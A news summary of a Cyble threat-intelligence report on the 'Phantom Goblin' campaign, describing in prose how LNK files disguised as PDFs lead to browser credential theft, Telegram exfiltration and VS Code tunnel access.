Cyble Research and Intelligence Labs (CRIL) has uncovered a sophisticated campaign dubbed ‘Phantom Goblin’, which uses social engineering methods to distribute information-stealing malware.
The attack begins with seemingly harmless RAR file attachments that contain malicious shortcut (LNK) files, disguised as legitimate PDF documents. Upon execution, these LNK files trigger a sequence of stealthy operations aimed at gathering confidential information from the victim’s system.
Once the LNK file is executed, it launches a PowerShell command that retrieves and runs a remote script from a GitHub repository. This script establishes persistence on the infected machine by creating registry entries and downloading multiple payload files, all designed to mimic legitimate applications, allowing the malware to remain undetected.
Cyble analysts have noted that Phantom Goblin primarily targets web browsers and developer tools. The malware is capable of forcefully terminating browser processes to extract sensitive data, such as cookies, login credentials, and browsing history. It also leverages the Visual Studio Code (VS Code) tunnels to create and maintain unauthorized remote access to compromised systems.
The Phantom Goblin attack consists of three main executable components: updater.exe, vscode.exe, and browser.exe. The updater.exe component extracts cookies from major web browsers by first checking for running instances using tasklist commands, and then forcefully terminating them with taskkill.exe. Afterward, it archives the cookies into JSON files and bundles them into a ZIP archive, which is then transmitted to a Telegram bot for exfiltration.
The Vscode.exe component downloads a legitimate copy of Visual Studio Code and establishes a covert tunnel that enables remote access to the compromised system.
Browser.exe targets at least 14 different web browsers, extracting a variety of sensitive information including stored passwords, cookies, browsing history, and wallet data. All the stolen information is archived into a ZIP file, named after the username, and exfiltrated through Telegram.
“This malware attack highlights the increasing sophistication of cyber threats that leverage social engineering and trusted tools for stealthy execution. By disguising itself within a RAR attachment, it deceives users into executing a malicious LNK file that initiates PowerShell-based attacks,” the report noted.
